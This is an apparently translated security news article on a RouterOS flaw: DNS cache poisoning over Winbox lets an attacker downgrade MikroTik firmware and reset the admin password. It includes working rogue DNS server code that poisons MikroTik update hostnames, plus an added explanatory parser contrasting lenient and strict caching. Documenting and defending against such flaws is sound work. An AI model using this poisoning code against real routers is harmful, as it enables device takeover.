Backport vulnerability in RouterOS puts hundreds of thousands of devices at risk

The ability to remotely downgrade RouterOS-based (MikroTik) devices puts hundreds of thousands of network devices at risk. The vulnerability is tied to poisoning of the router's DNS cache over the Winbox protocol, and it makes it possible to load an outdated firmware (with the password reset) or a modified firmware onto the device.

Vulnerability details

The RouterOS platform supports handling DNS resolution requests.

This request is handled by a binary called resolver. Resolver is one of many binaries that hook into RouterOS's Winbox protocol. At a high level, "messages" sent to the Winbox port can be routed to different binaries in RouterOS based on an array-based numbering scheme.

By default, RouterOS has the DNS server feature disabled.

However, even when the server function is disabled, the router maintains its own DNS cache.

When we make a request with winbox_dns_request for, say, example.com, the router caches the result.

Since we can specify which DNS server the request should go to, pointing it at a rogue server is trivial. For example, you can set up the DNS server written by Philipp Klaus to always answer with an A record containing the IP address 192.168.88.250.

from dnslib import DNSRecord, DNSHeader, RR, A  # the script is built on dnslib

def dns_response(data):
    # Parse the incoming query and build a reply that echoes its id and question
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    # Answer whatever name was asked with the same A record
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()

Now, if you look up example.com via Winbox, you can see that the router's DNS cache has been poisoned.

Of course, poisoning example.com is not very useful, since the router will not use it. However, the router needs to reach upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com and download.mikrotik.com. And thanks to another bug, it is possible to poison all of them at once.

from dnslib import DNSRecord, DNSHeader, RR, A  # the script is built on dnslib

def dns_response(data):
    # Parse the incoming query and build a reply that echoes its id and question
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
    # Four additional answers for names that were never asked about,
    # with a one-week TTL so they stay in the cache
    reply.add_answer(RR("upgrade.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com", ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:\n", reply)
    return reply.pack()

The router asks for one name, and we return five. The router incorrectly caches all of the answers.
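The root cause is that the resolver caches answer records whose owner name is unrelated to the question it asked. The following added example (not from the original article or from MikroTik) parses a constructed wire-format reply carrying the five answers described above and shows what a lenient cache accepts versus a cache that only keeps records for the queried name; the reply bytes and the function names are this example's own.

```python
import struct

# Constructed wire-format DNS reply (not captured from a router): one question
# for example.com and five A answers, four of them for names never asked about.
def _name(s):
    return b"".join(bytes([len(l)]) + l.encode() for l in s.split(".")) + b"\x00"

def _rr(name, ttl, ip):
    rdata = bytes(int(o) for o in ip.split("."))
    return _name(name) + struct.pack(">HHIH", 1, 1, ttl, 4) + rdata   # type A, class IN

POISON = "192.168.88.250"
ANSWERS = [("example.com", 30), ("upgrade.mikrotik.com", 604800),
           ("cloud.mikrotik.com", 604800), ("cloud2.mikrotik.com", 604800),
           ("download.mikrotik.com", 604800)]
SAMPLE_REPLY = (struct.pack(">HHHHHH", 0x1234, 0x8580, 1, len(ANSWERS), 0, 0)
                + _name("example.com") + struct.pack(">HH", 1, 1)
                + b"".join(_rr(n, t, POISON) for n, t in ANSWERS))

def read_name(msg, off):
    """Read a DNS name at offset, following compression pointers (RFC 1035)."""
    labels = []
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:                       # compression pointer
            ptr = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            name, _ = read_name(msg, ptr)
            return ".".join(labels + [name]), off + 2
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(msg[off:off + n].decode()); off += n

def parse_reply(msg):
    """Return (queried name, [(owner name, ttl, ip) for each A answer])."""
    txid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    qname, off = read_name(msg, off); off += 4     # skip qtype and qclass
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10]); off += 10
        rdata = msg[off:off + rdlen]; off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ttl, ".".join(map(str, rdata))))
    return qname, answers

def cache_answers(msg, strict=True):
    # strict=False mirrors the RouterOS behaviour described above (every answer
    # is cached); strict=True keeps only records for the name actually queried.
    qname, answers = parse_reply(msg)
    return {n: (ttl, ip) for n, ttl, ip in answers if not strict or n == qname}
```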

Obviously, this attack is also effective when the router acts as a DNS server, since it lets the router's users be attacked as well.

This attack also allows a more serious vulnerability to be exploited: downgrading or backporting the RouterOS version. The attacker recreates the logic of the update server, including the changelog, and forces RouterOS to treat the outdated (vulnerable) version as current. The danger lies in the fact that when the version is "updated", the administrator password is reset to its default value: an attacker can log into the system with an empty password!


The attack is quite workable, although in reality the author used several vectors, including ones related to embedding a backdoor into the firmware; but that is already a reverse-engineering exercise, and using it for illegal purposes is unlawful.

Protection

Only disabling Winbox protects against these attacks. Despite the convenience of managing the device via Winbox, it is better to use the SSH protocol.

Source: www.hab.com